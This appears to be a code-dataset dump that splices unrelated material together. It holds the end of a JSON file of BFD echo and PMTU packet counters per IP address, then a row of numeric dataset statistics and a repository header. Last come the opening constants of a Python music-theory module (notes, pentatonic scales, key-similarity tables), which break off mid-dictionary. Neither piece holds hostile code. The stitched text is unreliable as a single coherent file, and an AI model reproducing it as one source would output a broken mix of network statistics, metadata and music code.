"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.40.4": {
"src_port": 12346,
"dst_port": 12366,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294151,
"bfd_echo_rx_pkts": 293675,
"bfd_echo_tx_octets": 30169493,
"bfd_echo_rx_octets": 34195788
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2531,
"bfd_pmtu_rx_pkts": 2531,
"bfd_pmtu_tx_octets": 1839848,
"bfd_pmtu_rx_octets": 1876658
}
}
},
"151.0.0.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299699,
"bfd_echo_rx_pkts": 299699,
"bfd_echo_tx_octets": 30718843,
"bfd_echo_rx_octets": 34915238
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"151.0.1.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"151.0.2.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299748,
"bfd_echo_rx_pkts": 299727,
"bfd_echo_tx_octets": 30723946,
"bfd_echo_rx_octets": 34918493
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"151.0.3.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"151.0.4.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294490,
"bfd_echo_rx_pkts": 294444,
"bfd_echo_tx_octets": 30203166,
"bfd_echo_rx_octets": 34284946
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"151.0.6.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294131,
"bfd_echo_rx_pkts": 293740,
"bfd_echo_tx_octets": 30167674,
"bfd_echo_rx_octets": 34202832
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"151.0.7.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294313,
"bfd_echo_rx_pkts": 294009,
"bfd_echo_tx_octets": 30185860,
"bfd_echo_rx_octets": 34234335
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"151.0.40.4": {
"src_port": 12346,
"dst_port": 12366,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294178,
"bfd_echo_rx_pkts": 293702,
"bfd_echo_tx_octets": 30172530,
"bfd_echo_rx_octets": 34198664
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
}
}
}
}
}
| 40.956127 | 59 | 0.293994 | 1,921 | 27,072 | 3.655388 | 0.080167 | 0.179436 | 0.092281 | 0.076901 | 0.715038 | 0.715038 | 0.715038 | 0.715038 | 0.715038 | 0.715038 | 0 | 0.200585 | 0.621011 | 27,072 | 660 | 60 | 41.018182 | 0.483821 | 0 | 0 | 0.593939 | 0 | 0 | 0.230275 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
31d6662e308bf4de5302074ee88b2511e5329bed | 211,848 | py | Python | src/Skeleton/MusicTheory.py | Voice-First-AI/generative-music-watson | e666f64602baab2e35a66c0a5c4389b1bd5666c9 | [
"Apache-2.0"
] | null | null | null | src/Skeleton/MusicTheory.py | Voice-First-AI/generative-music-watson | e666f64602baab2e35a66c0a5c4389b1bd5666c9 | [
"Apache-2.0"
] | null | null | null | src/Skeleton/MusicTheory.py | Voice-First-AI/generative-music-watson | e666f64602baab2e35a66c0a5c4389b1bd5666c9 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
Notes = [ "C", "Cs", "D", "Ds", "E", "F", "Fs", "G", "Gs", "A", "As", "B" ] ;
HalfNote = 0.5
ThirtySecondNote = 0.03125
QuarterNote = 0.25
EighthNote = 0.125
SixteenthNote = 0.0625
HalfNoteAndRest = 1.0
QuarterNoteAndRest = 0.25
EighthNoteAndRest = 0.125
SixteenthNoteAndRest = 0.0625
ThirtySecondNoteAndRest = 0.03125
BassOctaveRange = [ 4, 4]
MelodyOctaveRange = [5, 5 ]
DefaultOctaveRange = [4, 5 ]
EightNoteInTicks = 240
SixteenthNoteInTicks = 120
NotesToPitch = {
'C' : 0,
'Cs': 1,
'D' : 2,
'Ds': 3,
'E' : 4,
'F' : 5,
'Fs': 6,
'G' : 7,
'Gs': 8,
'A' : 9,
'As': 10,
'B' : 11 } ;
pitchToNotes = {
0 :'C' ,
1 :'Cs' ,
2 :'D' ,
3 :'Ds' ,
4 :'E' ,
5 :'F' ,
6 :'Fs' ,
7 :'G' ,
8 :'Gs' ,
9 :'A' ,
10:'As' ,
11:'B' , } ;
PentatonicScale = {
'GsMajor': ['Gs', 'As', 'C', 'Ds', 'F' ],
'CMajor': ['C', 'D', 'E', 'G', 'A' ],
'DOct': ['D', 'Ds', 'F', 'Gs', 'A' ],
'BMinor': ['B', 'D', 'E', 'Fs', 'A' ],
'CArabic': ['C', 'Cs', 'E', 'G', 'Gs' ],
'CsMinor': ['Cs', 'E', 'Fs', 'Gs', 'B' ],
'FsMinor': ['Fs', 'A', 'B', 'Cs', 'E' ],
'GMajor': ['G', 'A', 'B', 'D', 'E' ],
'COct': ['C', 'Cs', 'Ds', 'Fs', 'G' ],
'EMinor': ['E', 'G', 'A', 'B', 'D' ],
'DMinor': ['D', 'F', 'G', 'A', 'C' ],
'FMajor': ['F', 'G', 'A', 'C', 'D' ],
'CMinor': ['C', 'Ds', 'F', 'G', 'As' ],
'CsOct': ['Cs', 'D', 'E', 'G', 'Gs' ],
'CsMajor': ['Cs', 'Ds', 'F', 'Gs', 'As' ],
'DsMajor': ['Ds', 'F', 'G', 'As', 'C' ],
'GsMinor': ['Gs', 'B', 'Cs', 'Ds', 'Fs' ],
'BMajor': ['B', 'Cs', 'Ds', 'Fs', 'Gs' ],
'AsMinor': ['As', 'Cs', 'Ds', 'F', 'Gs' ],
'AsMajor': ['As', 'C', 'D', 'F', 'G' ],
'DsMinor': ['Ds', 'Fs', 'Gs', 'As', 'Cs' ],
'AMajor': ['A', 'B', 'Cs', 'E', 'Fs' ],
'FMinor': ['F', 'Gs', 'As', 'C', 'Ds' ],
'EMajor': ['E', 'Fs', 'Gs', 'B', 'Cs' ],
'CHMinor': ['C', 'Ds', 'F', 'G', 'B' ],
'GMinor': ['G', 'As', 'C', 'D', 'F' ],
'AMinor': ['A', 'C', 'D', 'E', 'G' ],
'FsMajor': ['Fs', 'Gs', 'As', 'Cs', 'Ds' ],
'DMajor': ['D', 'E', 'Fs', 'A', 'B' ],
}
Pentatonic = {
'Minor': [ 1,3,4,5,7] ,
'CMajor': [ 1,2,3,5,6] ,
'DMajor': [ 1,2,3,5,6] ,
'FMajor': [ 1,2,3,5,6] ,
'EMajor': [ 1,2,3,5,6] ,
'GMajor': [ 1,2,3,5,6] ,
'AMajor': [ 1,2,3,5,6] ,
'CsMajor': [ 1,2,3,5,6] ,
'AsMajor': [ 1,2,3,5,6] ,
'GsMajor': [ 1,2,3,5,6] ,
'DsMajor': [ 1,2,3,5,6] ,
'Major': [ 1,2,3,5,6] ,
'CMinor': [ 1,3,4,5,7] ,
'GMinor': [ 1,3,4,5,7] ,
'BMinor': [ 1,3,4,5,7] ,
'EMinor': [ 1,3,4,5,7] ,
'FMinor': [ 1,3,4,5,7] ,
'FsMinor': [ 1,3,4,5,7] ,
'CsMinor': [ 1,3,4,5,7] ,
'GsMinor': [ 1,3,4,5,7] ,
'AsMinor': [ 1,3,4,5,7] ,
}
MinorKeys = [ 'CMinor', 'CsMinor', 'DMinor', 'DsMinor', 'EMinor', 'FMinor', 'FsMinor', 'GMinor', 'GsMinor', 'AMinor', 'AsMinor', 'BMinor' ]
MajorKeys = [ 'CMajor', 'CsMajor', 'DMajor', 'DsMajor', 'EMajor', 'FMajor', 'FsMajor', 'GMajor', 'GsMajor', 'AMajor', 'AsMajor', 'BMajor' ]
AllKeys = [ 'CMajor', 'CsMajor', 'DMajor', 'DsMajor', 'EMajor', 'FMajor', 'FsMajor', 'GMajor', 'GsMajor', 'AMajor', 'AsMajor', 'BMajor',
'CMinor', 'CsMinor', 'DMinor', 'DsMinor', 'EMinor', 'FMinor', 'FsMinor', 'GMinor', 'GsMinor', 'AMinor', 'AsMinor', 'BMinor' ]
ScaleSimilarity = {
'CMajor' : {
'smallJump' : ['CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMinor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'DsMajor', 'AsMajor', 'AMajor', 'CHMinor', 'GMinor', 'AMinor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CsMinor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FMinor', 'EMajor', 'FsMajor'] ,
},
'CsMajor' : {
'smallJump' : ['GsMajor', 'CsMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor'] ,
'modJump' : ['GsMajor', 'DOct', 'CArabic', 'CsMinor', 'COct', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'EMajor', 'CHMinor', 'GMinor', 'FsMajor'] ,
'bigJump' : ['CMajor', 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMajor', 'AMinor', 'DMajor'] ,
},
'DMajor' : {
'smallJump' : ['BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'DMajor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CsOct', 'GsMinor', 'BMajor', 'AMajor', 'EMajor', 'AMinor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'FsMajor'] ,
},
'DsMajor' : {
'smallJump' : ['GsMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'CArabic', 'COct', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor', 'FsMajor'] ,
'bigJump' : ['BMinor', 'CsMinor', 'FsMinor', 'GMajor', 'EMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor', 'DMajor'] ,
},
'EMajor' : {
'smallJump' : ['CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor'] ,
'modJump' : ['DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'CsOct', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'EMajor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CMajor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor'] ,
},
'FMajor' : {
'smallJump' : ['CMajor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'BMinor', 'CArabic', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor', 'DMajor'] ,
'bigJump' : ['CsMinor', 'FsMinor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'EMajor', 'FsMajor'] ,
},
'FsMajor' : {
'smallJump' : ['CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FsMajor'] ,
'modJump' : ['GsMajor', 'DOct', 'CArabic', 'CsMinor', 'FsMinor', 'COct', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'FMinor', 'EMajor', 'CHMinor', 'FsMajor'] ,
'bigJump' : ['CMajor', 'BMinor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor', 'DMajor'] ,
},
'GMajor' : {
'smallJump' : ['CMajor', 'BMinor', 'GMajor', 'EMinor', 'AMinor', 'DMajor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CsOct', 'AsMajor', 'AMajor', 'EMajor', 'CHMinor', 'GMinor', 'AMinor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor'] ,
},
'GsMajor' : {
'smallJump' : ['GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'FMinor'] ,
'modJump' : ['GsMajor', 'DOct', 'CArabic', 'COct', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'FsMajor'] ,
'bigJump' : ['CMajor', 'BMinor', 'CsMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'EMajor', 'AMinor', 'DMajor'] ,
},
'AMajor' : {
'smallJump' : ['BMinor', 'CsMinor', 'FsMinor', 'AMajor', 'EMajor', 'DMajor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'CsOct', 'GsMinor', 'BMajor', 'DsMinor', 'AMajor', 'EMajor', 'AMinor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'DMinor', 'FMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor'] ,
},
'AsMajor' : {
'smallJump' : ['DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'GMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor'] ,
'bigJump' : ['BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'AMajor', 'EMajor', 'FsMajor', 'DMajor'] ,
},
'BMajor' : {
'smallJump' : ['CsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'EMajor', 'FsMajor'] ,
'modJump' : ['GsMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'COct', 'CsOct', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'FMinor', 'EMajor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'CHMinor', 'GMinor', 'AMinor'] ,
},
'CMinor' : {
'smallJump' : ['GsMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'CArabic', 'COct', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor', 'FsMajor'] ,
'bigJump' : ['BMinor', 'CsMinor', 'FsMinor', 'GMajor', 'EMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor', 'DMajor'] ,
},
'CsMinor' : {
'smallJump' : ['CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor'] ,
'modJump' : ['DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'CsOct', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'EMajor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CMajor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor'] ,
},
'DMinor' : {
'smallJump' : ['CMajor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'BMinor', 'CArabic', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor', 'DMajor'] ,
'bigJump' : ['CsMinor', 'FsMinor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'EMajor', 'FsMajor'] ,
},
'DsMinor' : {
'smallJump' : ['CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FsMajor'] ,
'modJump' : ['GsMajor', 'DOct', 'CArabic', 'CsMinor', 'FsMinor', 'COct', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'FMinor', 'EMajor', 'CHMinor', 'FsMajor'] ,
'bigJump' : ['CMajor', 'BMinor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor', 'DMajor'] ,
},
'EMinor' : {
'smallJump' : ['CMajor', 'BMinor', 'GMajor', 'EMinor', 'AMinor', 'DMajor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CsOct', 'AsMajor', 'AMajor', 'EMajor', 'CHMinor', 'GMinor', 'AMinor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor'] ,
},
'FMinor' : {
'smallJump' : ['GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'FMinor'] ,
'modJump' : ['GsMajor', 'DOct', 'CArabic', 'COct', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'FsMajor'] ,
'bigJump' : ['CMajor', 'BMinor', 'CsMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'EMajor', 'AMinor', 'DMajor'] ,
},
'FsMinor' : {
'smallJump' : ['BMinor', 'CsMinor', 'FsMinor', 'AMajor', 'EMajor', 'DMajor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'CsOct', 'GsMinor', 'BMajor', 'DsMinor', 'AMajor', 'EMajor', 'AMinor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'DMinor', 'FMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor'] ,
},
'GMinor' : {
'smallJump' : ['DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'GMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor'] ,
'bigJump' : ['BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'AMajor', 'EMajor', 'FsMajor', 'DMajor'] ,
},
'GsMinor' : {
'smallJump' : ['CsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'EMajor', 'FsMajor'] ,
'modJump' : ['GsMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'COct', 'CsOct', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'FMinor', 'EMajor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'CHMinor', 'GMinor', 'AMinor'] ,
},
'AMinor' : {
'smallJump' : ['CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMinor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'DsMajor', 'AsMajor', 'AMajor', 'CHMinor', 'GMinor', 'AMinor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CsMinor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FMinor', 'EMajor', 'FsMajor'] ,
},
'AsMinor' : {
'smallJump' : ['GsMajor', 'CsMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor'] ,
'modJump' : ['GsMajor', 'DOct', 'CArabic', 'CsMinor', 'COct', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'EMajor', 'CHMinor', 'GMinor', 'FsMajor'] ,
'bigJump' : ['CMajor', 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMajor', 'AMinor', 'DMajor'] ,
},
'BMinor' : {
'smallJump' : ['BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'DMajor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CsOct', 'GsMinor', 'BMajor', 'AMajor', 'EMajor', 'AMinor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'FsMajor'] ,
},
'COct' : {
'smallJump' : ['COct'] ,
'modJump' : ['GsMajor', 'BMinor', 'CsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'AsMajor', 'FMinor', 'EMajor', 'GMinor', 'DMajor'] ,
'bigJump' : ['CMajor', 'DOct', 'CArabic', 'FsMinor', 'CMinor', 'CsOct', 'DsMajor', 'DsMinor', 'AMajor', 'CHMinor', 'AMinor', 'FsMajor'] ,
},
'DOct' : {
'smallJump' : ['DOct'] ,
'modJump' : ['CMajor', 'DOct', 'CsMinor', 'FsMinor', 'GMajor', 'EMinor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'AMajor', 'EMajor', 'CHMinor', 'GMinor', 'AMinor', 'FsMajor'] ,
'bigJump' : ['GsMajor', 'BMinor', 'CArabic', 'COct', 'DMinor', 'FMajor', 'CsOct', 'GsMinor', 'BMajor', 'FMinor', 'DMajor'] ,
},
'CsOct' : {
'smallJump' : ['CsOct'] ,
'modJump' : ['GsMajor', 'CMajor', 'BMinor', 'CArabic', 'FsMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'DsMajor', 'GsMinor', 'BMajor', 'DsMinor', 'AMajor', 'FMinor', 'CHMinor', 'AMinor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['DOct', 'CsMinor', 'GMajor', 'COct', 'EMinor', 'CsMajor', 'AsMinor', 'AsMajor', 'EMajor', 'GMinor'] ,
},
'CArabic' : {
'smallJump' : ['CArabic', 'CsOct'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'FMinor', 'EMajor', 'CHMinor', 'AMinor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['AsMajor', 'GMinor'] ,
},
'CHMinor' : {
'smallJump' : ['DOct', 'CMinor', 'DsMajor', 'CHMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'CArabic', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor', 'FsMajor'] ,
'bigJump' : ['BMinor', 'CsMinor', 'FsMinor', 'COct', 'GsMinor', 'BMajor', 'AMajor', 'EMajor', 'DMajor'] ,
},
}
AcceptableChords = { 1: { 'acceptableNoteA': 3, 'acceptableNoteB': 5},
2: { 'acceptableNoteA': 4, 'acceptableNoteB': 6} ,
3: { 'acceptableNoteA': 5, 'acceptableNoteB': 7} ,
4: { 'acceptableNoteA': 6, 'acceptableNoteB': 1} ,
5: { 'acceptableNoteA': 7, 'acceptableNoteB': 2} ,
6: { 'acceptableNoteA': 1, 'acceptableNoteB': 3} ,
7: { 'acceptableNoteA': 2, 'acceptableNoteB': 4} ,
}
DiminishedChord = { 'CMajor': 7,
'GMajor': 7,
'CMinor': 2,
'AMajor': 7,
'GsMajor': 7,
'GMinor': 2,
'FMinor': 2,
'BMinor': 2,
'CsMinor': 2,
'FsMinor': 2,
'GsMinor': 2,
'AsMinor': 2,
} ;
KeyDict = {
'CMajor': { 'C':1, 'D':2, 'E':3, 'F':4, 'G':5, 'A':6, 'B':7 },
'CsMajor': { 'Cs':1, 'Ds':2, 'F':3, 'Fs':4, 'Gs':5, 'As':6, 'C':7 },
'DMajor': { 'D':1, 'E':2, 'Fs':3, 'G':4, 'A':5, 'B':6, 'Cs':7 },
'DsMajor': { 'Ds':1, 'F':2, 'G':3, 'Gs':4, 'As':5, 'C':6, 'D':7 },
'EMajor': { 'E':1, 'Fs':2, 'Gs':3, 'A':4, 'B':5, 'Cs':6, 'Ds':7 },
'FMajor': { 'F':1, 'G':2, 'A':3, 'As':4, 'C':5, 'D':6, 'E':7 },
'FsMajor': { 'Fs':1, 'Gs':2, 'As':3, 'B':4, 'Cs':5, 'Ds':6, 'F':7 },
'GMajor': { 'G':1, 'A':2, 'B':3, 'C':4, 'D':5, 'E':6, 'Fs':7 },
'GsMajor': { 'Gs':1, 'As':2, 'C':3, 'Cs':4, 'Ds':5, 'F':6, 'G':7 },
'AMajor': { 'A':1, 'B':2, 'Cs':3, 'D':4, 'E':5, 'Fs':6, 'Gs':7 },
'AsMajor': { 'As':1, 'C':2, 'D':3, 'Ds':4, 'F':5, 'G':6, 'A':7 },
'BMajor': { 'B':1, 'Cs':2, 'Ds':3, 'E':4, 'Fs':5, 'Gs':6, 'As':7 },
'CMinor': { 'C':1, 'D':2, 'Ds':3, 'F':4, 'G':5, 'Gs':6, 'As':7 },
'CsMinor': { 'Cs':1, 'Ds':2, 'E':3, 'Fs':4, 'Gs':5, 'A':6, 'B':7 },
'DMinor': { 'D':1, 'E':2, 'F':3, 'G':4, 'A':5, 'As':6, 'C':7 },
